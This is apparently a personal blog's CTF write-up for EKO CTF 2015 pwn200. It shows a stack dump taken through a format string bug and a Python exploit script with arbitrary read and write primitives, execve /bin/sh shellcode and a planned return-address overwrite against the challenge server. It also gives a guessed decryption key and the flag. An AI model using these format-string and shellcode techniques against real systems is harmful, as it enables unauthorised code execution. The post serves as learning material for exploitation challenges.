EKO CTF pwn200

Games/CTF 2015. 9. 17. 23:10

WTF?

this is not pwn task :(

binary getting with fsb seems incorrect.

just guessed the algorithm and got flag.


I can see stack. there is no ASLR....

root@ubuntu:~/tmp/eko# python stack.py 

<Simple loop greetings v1.3.3.7>

[!] Type bye to quit

Enter your name: 

stage1 start!

0xbffff754:(1th) -> 13370a97

0xbffff758:(2th) -> c

0xbffff75c:(3th) -> 1337070e

0xbffff760:(4th) -> 10

0xbffff764:(5th) -> 13370326

0xbffff768:(6th) -> 0

0xbffff76c:(7th) -> 25000000

0xbffff770:(8th) -> a782438

0xbffff774:(9th) -> 0

0xbffff778:(10th) -> 0

0xbffff77c:(11th) -> bcc80900

0xbffff780:(12th) -> 0

0xbffff784:(13th) -> b7fd1000

0xbffff788:(14th) -> bffff7a8

0xbffff78c:(15th) -> 13370985

0xbffff790:(16th) -> 13372080

0xbffff794:(17th) -> 13370ae3

0xbffff798:(18th) -> 133709ab

0xbffff79c:(19th) -> b7fd1000

0xbffff7a0:(20th) -> 133709a0

0xbffff7a4:(21th) -> 0

0xbffff7a8:(22th) -> 0

0xbffff7ac:(23th) -> b7e43a63

0xbffff7b0:(24th) -> 1

0xbffff7b4:(25th) -> bffff844

0xbffff7b8:(26th) -> bffff84c


first, grab binary from ELF base 0x13370000

then I can see all the logics.

but the flag generation logic seems wrong... (XOR 4 byte)

so, I control EIP and jump to flag printing part. but nothing :(



from socket import *

import sys, os, struct, time, random, urllib, urllib2, string, hashlib, telnetlib


shell = "\x31\xD2\x52\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x52\x53\x89\xE1\x31\xC0\xB0\x0B\xCD\x80"

shell = "\xeb\xfe"


# common stuffs

p  = lambda x: struct.pack("<L", x)

pq = lambda x: struct.pack("<Q", x)

ph = lambda x: struct.pack("<H", x)

pb = lambda x: struct.pack("<B", x)


def recv_until(s, pat):

msg = ''

while True:

msg += s.recv(1024)

if msg.find(pat) != -1:

break

return msg


def check_stack(s):

recv_until(s, 'name: ')

print '== stack dump =='

for i in xrange(1, 120):

       payload = '%{0}$x'.format(i)

       s.send(payload + '\n')

       r = s.recv(1024).split('Hi ')[1].split('\n')[0]

       print '{0}:({1}th) -> {2}'.format(hex(0xbffff750+4*i), i, r)


# lsb : 0~3, byte : 0~255

def make_pointer(s, lsb, byte):

recv_until(s, 'name: ')

payload = '%{0}c%26$hhn'.format(16+lsb)

s.send(payload + '\n') # 0xbffff910 at $63

recv_until(s, 'name: ')

payload = '%{0}c%63$hhn'.format(byte)

s.send(payload + '\n') # write lsb1 at $112


# overwrite a byte to pointer. MSB first!

def write_byte_to_pointer(s, byte):

recv_until(s, 'name: ')

payload = '%{0}c%112$n'.format(byte)

s.send(payload + '\n')


# LSB first.

def write_byte_where(s, addr, byte):

make_pointer(s, 3, ((addr&0xff000000) >> 24))

make_pointer(s, 2, ((addr&0x00ff0000) >> 16))

make_pointer(s, 1, ((addr&0x0000ff00) >> 8))

make_pointer(s, 0, ((addr&0x000000ff) >> 0))

write_byte_to_pointer(s, byte)


# write data into memory

def mem_write(s, addr, data):

i=0

for d in data:

print 'writing a byte {0}'.format(hex(ord(d)))

write_byte_where(s, addr + i, d)

i += 1


def mem_read(s, addr):

bin = ''

recv_until(s, 'name: ')

        payload = 'A' + p(addr) + 'FG%8$s'

        s.send(payload + '\n')

        result = s.recv(8192)

        result = result.split('FG')[1].split('Enter')[0]

        result = result.replace('\n\n', '\x00')

        bin += result.encode('hex')

        return '{0}: {1}'.format(hex(addr), bin)


# pwn

s = socket(AF_INET, SOCK_STREAM)

s.connect( ('challs.ctf.site',  20002) )


# ret at 0xbffff78c

# $112 -> 0xbffff910 (target pointer location)

# argv at $26(0xbffff84c) points to $63(0xbffff96e)

# fflush.got : 0x1337201c (0xb7e8ce30)

# strcmp.got : 0x13372010

# overwrite strcmp.got at $112 (0x133708cc)

print mem_read(s, 0x13373008)

'''

print 'injecting shellcode at 0xbffff110...'

mem_write(s, 0xbffff310, shell)


print 'overwriting ret address...'

mem_write(s, 0xbffff78c, p(0xbffff110))

'''

# return.

print 'return!'

recv_until(s, 'name: ')

s.send('bye\n')


#check_stack(s)


t = telnetlib.Telnet()

t.sock = s

t.interact()




tried to get shell, but before doing that,

I just ignored the logic (xor until 4byte) and change the logic and got flag...

this is stupid task... :(


dumping 0x13372080

075b5403400f4c1ab20b0c0b04771e244c7942e72cb4bfa0407a797a320c68b932b7f062a7aca6e0686a6f542859a83dee9704939fcdf05b0a080b3e5fcd5faf00


dumping 0x13370ae3

336b305f70347274795f323031352100

"3k0_p4rty_2015!"


dumping 0x133720c1

7173271f1d4847 00

qs'HG



dumping 0x133720cc (encrypted flag)

560c0a1d67084218575c534f1a047221183a310549262c18091e1a705c6b00

3437666134363461336330303935316637383364643335303731333663323933623762353135396632333

V

3430645c303b3e6ecb543e3b35423f1727491d9718c6cbd91f48494b072d5bd202e88056d5d8dfbf5a5a5e61096ac30db1e730e1ebb4af693a393e1f



key (not real one, I just guessed to be like this by ignoring 4byte limit)

34376661343634613363303039353166373833646433353037313336633239336237623531353966323334346539316261366236376365326262646230653131


47fa464a3c00951f783dd3507136c293b7b5159f2344e91ba6b67ce2bbdb0e11


decrypt this(560c0a1d67084218575c534f1a047221183a310549262c18091e1a705c6b00) with key(34376661343634613363303039353166373833646433353037313336633239336237623531) then I get flag. I don't know why :(


EKO{b4by_3xpl0it_FMT_str1ng_FTW!#$}






'Games > CTF' 카테고리의 다른 글

PlaidCTF 2015 RAM  (0) 2015.11.18
화이트햇 콘테스트 2015 한글 익스플로잇 분석  (6) 2015.10.27
EKO CTF pwn200  (0) 2015.09.17
DEFCON 2014 Final - wdub  (0) 2015.09.09
MMA CTF 2015 SPELL  (0) 2015.09.08
MMA CTF 2015 RPS  (0) 2015.09.08
Posted by daehee87

댓글을 달아 주세요